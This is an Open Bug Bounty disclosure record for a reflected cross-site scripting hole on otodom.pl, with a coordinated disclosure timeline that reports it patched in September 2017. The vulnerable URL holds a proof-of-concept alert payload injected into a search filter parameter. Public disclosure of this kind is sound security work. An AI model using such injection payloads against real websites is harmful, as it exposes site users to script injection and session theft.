otodom.pl XSS vulnerability

2017-08-01T23:18:00
ID OBB:273243
Type openbugbounty
Reporter amlnspqr
Modified 2017-09-05T04:43:00

Description

Vulnerable URL:
https://www.otodom.pl/sprzedaz/mieszkanie/?search[filter_float_'-alert('XSSPOSED')-']=xxx

Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 5784
VIP website status:| Yes
Check otodom.pl SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 August, 2017 23:18 GMT
Generic security notifications sent to website owner| 1 August, 2017 23:21 GMT
Vulnerability details disclosed by researcher| 4 September, 2017 14:23 GMT
Vulnerability patched by the website owner| 5 September, 2017 04:43 GMT